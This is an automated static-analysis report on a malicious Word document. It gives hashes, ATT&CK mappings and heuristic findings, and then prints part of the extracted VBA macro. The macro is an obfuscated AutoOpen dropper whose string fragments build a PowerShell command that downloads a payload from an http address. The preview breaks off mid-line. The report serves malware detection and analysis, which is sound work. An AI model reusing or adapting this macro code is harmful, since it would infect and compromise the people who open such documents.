Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c50902139d81f59f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 126.5 KB
Created: 2018-02-13 13:51:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 972b1070d15609e441938fdcc7e42c7a
SHA-1: 46cc38700abf0c1a51538d1b9bb3f8e29cf7671c
SHA-256: c50902139d81f59ff810cc880d4c35644ee31451f11a428013c389457c6ac7cc
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file contains a VBA macro with an AutoOpen routine, a common technique for executing code as soon as the document is opened. The macro makes a Shell() call, indicating that it is designed to launch an external payload. ClamAV identifies the file as 'Doc.Dropper.Agent-6447747-0', suggesting its purpose is to drop or download further malware. The obfuscated script makes it difficult to determine the exact payload, but the overall behaviour points to a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6447747-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447747-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24826 bytes
SHA-256: f08ff0de306d14b68b71b2cffc2bdec3e6b4b7f827cebc2be781777f038e3383
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IsLhzhocwqWjLE"
Sub AutoOpen()
On Error Resume Next
zqYkizjRQ = tzU - Sgn(WhMbcLRqTKpPLY) - (8827269 - Tan(7749295) / 7594660 - ChrW(wqpfSjSXN))
THdTiJMtK = WIJwGWNvSlI - Sgn(cQPBdGqO) - (5562509 - Tan(1818684) / 875102 - ChrW(wjqrKFzfjERVms))
iJFozmFvf = DdjFD - Sgn(GMDLAXfVkMmco) - (4491287 - Tan(9773693) / 8781053 - ChrW(lYhJoJ))
Application.Run "HkbtiqAzm", VZUfKwITAk
StCDdnhZt = owERbrLdj - Sgn(nzc) - (1486044 - Tan(1613008) / 2722625 - ChrW(OuhVm))
RDlSwUBiD = tAzZubmuNDal - Sgn(SQuuPdSi) - (2158229 - Tan(1206464) / 377058 - ChrW(BjJsqbAzzG))
bHjTibAUS = jjTBE - Sgn(mEkIiuws) - (8658070 - Tan(9210880) / 5708613 - ChrW(WbZ))
End Sub
Function VZUfKwITAk()
On Error Resume Next
QiGavkiL = NZaO - Sgn(IbYPkkTV) - (2434647 - Tan(5409411) / 1640903 - ChrW(wTJYrm))
zvZpn = UJJcK - Sgn(voorrkZiXE) - (3845859 - Tan(4340050) / 1354472 - ChrW(BORwrHiBQfhWnP))
vsNnGTOmiz = OwwOjpvidVrif - Sgn(OpCkmKFsK) - (7106670 - Tan(410447) / 9446648 - ChrW(YJKVzKoIGVIXK))
ntNhCSESz = WzCvVwacv + Mid(dzFJAwvM + "fSwYqruuW7+aW7V.exi3uV+3uVMVaW7+aW7+aW7+aW'+'7iaW7+'+'ahXz'+'+hXzW7MaW7+aW7Veiah'+'X'+'z+hXzW7+aW7MV);fo3uV+3uVaW7+aW7reaW7+aW3uV+3uV7ach('+'pTXasfc iaW7+aW7n pTXADCXaWQWTczwmrJNdRpwz" + vWklimLTQwAjp, 9, 160)
QwZXhsSOXvr = OMmvWVSzuYqT - Sgn(UuNc) - (707824 - Tan(4091334) / 948126 - ChrW(ldtTWSfjwF))
AAOVhriEr = mSHvkOjOUiFAMG - Sgn(WkYYBTRGcjtbz) - (710823 - Tan(7485029) / 3154526 - ChrW(TrjpNwcNUHkCjc))
rutpkSV = MdvvKXDfUL - Sgn(MrmjKhNGh) - (4138323 - Tan(4979375) / 656518 - ChrW(mvKhM))
VjARmd = jndzZDa + Mid(qil + "TFavKEUSUaLJX hXz+hX'+'z= iMahXz+hXzW7+aW7V aW7+aW7htt'+'3uV+3uV'+'p:aW7+ahX'+'z+hXzW7//va'+'W7hXz+hXz+aW7aDMw" + FoW, 13, 95)
JMnBXR = WTnHhF - Sgn(XNCpIfSKNZ) - (5170755 - Tan(145796) / 1976156 - ChrW(wPiOXMAbwWj))
XwzfsvzTm = NsrYWBjGDXuM - Sgn(tcBZAKHEiZ) - (722814 - Tan(1782158) / 8651629 - ChrW(tivQf))
nrQrAHRV = RSaS - Sgn(DZUEfZVRhdjz) - (520167 - Tan(9155205) / 2368827 - ChrW(liSnPdrmb))
qKzAbLHXzr = DwGMOWIrFaPL + Mid(iillb + "bCMwafoMjTaDMMzSGwQppShOm'+'E[30]+3uVx3uV)hXz)  -cREPlace ([CHaR]71+[CHaR]81+[C'+'HaR]112),[CHaR]36  -cREPlace  hXzZcNhXz,[CHaR]124  -RePLACEhXz3uVhXz,[CHaR'+']39) ) ') -rePlaCE  'hXz',[chaR]39  -CrEpKmQzA" + wCpZuLnalIP, 19, 182)
QGDZqYQCZOY = FLSChRS - Sgn(bokkTFXSKdwOkw) - (5297724 - Tan(6675297) / 8261254 - ChrW(DJXDFYajdjsib))
YYKGOqQ = aXrqvz - Sgn(ZCHXEfJiIjkL) - (7399383 - Tan(2521618) / 1743808 - ChrW(XjMKnbraj))
pCCavhRS = ioN - Sgn(lnrH) - (5886920 - Tan(1371600) / 2989705 - ChrW(AsQzUwHSpA))
mjZBh = GPGPaCij + Mid(lnAwzirKjJitVS + "FzRfDNQmEVOjNvdtAr]34).repLAc'+'e(aW7dB7aW7,[stRi'+'nG][CHAr]92).repLAhXz+hXzce(aW7iMVaW7hXz+hAYnVusSwta" + jjHiaahhcY, 17, 78)
zohAbLwpa = DCGhwhpzv - Sgn(cRzKwKSPlcYPvL) - (8172186 - Tan(2957485) / 2992477 - ChrW(rOzDSUtRY))
SDtNTPf = FdB - Sgn(XzNpwHPBQIf) - (1541355 - Tan(1011027) / 7699720 - ChrW(vqjS))
zBYbsufau = GhwYw - Sgn(RhlQJIbor) - (9527104 - Tan(9518500) / 160029 - ChrW(INpwpY))
LinJHCmzXO = wUHjoAzKh + Mid(DwUVDwzTfiBL + "iSHK+hXz+aW7.LcrToStraW'+'7+aW7BaW3uV+3uV7+aW7SsiBahXz+hXzW7+aW7SsNgLcr(),aW7+aW7 pTXaW7+aW7SDC);&aW7+TiXjJTPauVkkAPP" + iTtpHvSNLiXRk, 5, 98)
ITSZQVTuR = QjIAoNLXIFkwmJ - Sgn(wIJ) - (9254196 - Tan(3384595) / 6026738 - ChrW(wrAdwJzfV))
Ejzio = ApOHq - Sgn(CHiKHtOauHuL) - (8016865 - Tan(6126225) / 3736877 - ChrW(UqkRzKPCXdkbv))
pDfYJOJ = vuHTHomUSFdZiq - Sgn(npppIV) - (4677819 - Tan(4353105) / 4872268 - ChrW(srcmiImfzMAE))
cNDKrKI = PFJdKYLo + Mid(qzpqVqhPzw + "IIQujNrPnZKQnaW7hXz+hXz,[stRinG]3uV+3uV[CHAr]96).repLAc'+'e(([CHAr]112+[CHAr]84+3uV+3uV'+'[ChXz+hXzHAr]88)'+',aW73u'+'V+3uV8xkaW7).rhXz+hXzepLAce(aW7Lcra3'+'uV+3'+'uVW7,[stR3uV+3uVinG][CHLlw" + jRwJwpPK, 14, 174)
amwIRpwM = iOjTQLCVArk - Sgn(QSoCqM) - (318611 - Tan(8391577) / 4225754 - ChrW(cXsJhvQjhwfq))
AukIOZJYPM =
... (truncated)